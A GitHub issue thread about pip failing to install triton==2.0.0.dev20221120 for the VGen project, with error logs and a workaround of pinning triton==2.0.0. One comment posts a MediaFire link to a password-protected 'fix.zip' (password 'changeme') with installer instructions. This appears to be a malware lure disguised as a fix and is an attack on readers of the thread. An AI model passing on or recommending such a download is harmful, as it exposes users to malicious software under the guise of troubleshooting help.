### ISSUE TITLE
ERROR: No matching distribution found for triton==2.0.0.dev20221120

### ISSUE THREAD

**Issue by lxrswdd** [ali-vilab/VGen#145]
When I tried to install the environments by running the following codes:

`pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple`

I get :

```

  Using cached scikit_image-0.21.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (14 kB)
Collecting rotary-embedding-torch==0.2.1 (from -r requirements.txt (line 20))
  Using cached rotary_embedding_torch-0.2.1-py3-none-any.whl.metadata (682 bytes)
Collecting pynvml==11.5.0 (from -r requirements.txt (line 21))
  Downloading pynvml-11.5.0-py3-none-any.whl.metadata (7.8 kB)
ERROR: Ignored the following versions that require a different python version: 0.22.0 Requires-Python >=3.9; 0.22.0rc1 Requires-Python >=3.9; 0.23.0 Requires-Python >=3.10; 0.23.0rc0 Requires-Python >=3.10; 0.23.0rc2 Requires-Python >=3.10; 0.23.1 Requires-Python >=3.10; 0.23.2 Requires-Python >=3.10; 0.23.2rc1 Requires-Python >=3.10; 0.24.0 Requires-Python >=3.9; 0.24.0rc1 Requires-Python >=3.9; 1.4.0 Requires-Python >=3.9; 1.4.0rc1 Requires-Python >=3.9; 1.4.1.post1 Requires-Python >=3.9; 1.4.2 Requires-Python >=3.9; 1.5.0 Requires-Python >=3.9; 1.5.0rc1 Requires-Python >=3.9; 1.5.1 Requires-Python >=3.9
ERROR: Could not find a version that satisfies the requirement triton==2.0.0.dev20221120 (from versions: 0.4.1, 0.4.2, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 3.0.0)
ERROR: No matching distribution found for triton==2.0.0.dev20221120

```

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by erdemerencaglar** [comment]
Were you able to solve it?

**Comment by lxrswdd** [comment]
@erdemerencaglar 
I changed the environment.txt and installed triton==2.0.0 instead.

**Comment by yy1844** [comment]
ERROR: Ignored the following versions that require a different python version: 0.23.0 Requires-Python >=3.10; 0.23.0rc0 Requires-Python >=3.10; 0.23.0rc2 Requires-Python >=3.10; 0.23.1 Requires-Python >=3.10; 0.23.2 Requires-Python >=3.10; 0.23.2rc1 Requires-Python >=3.10; 0.25.0rc0 Requires-Python >=3.10; 0.25.0rc1 Requires-Python >=3.10
ERROR: Could not find a version that satisfies the requirement triton==2.0.0 (from versions: none)
ERROR: No matching distribution found for triton==2.0.0

请问如何解决trton，无论是2.0.0还是dev都安装不了

**Comment by weathon** [comment]
thanks

**Comment by yy1844** [comment]
邮件已收到，谢谢！
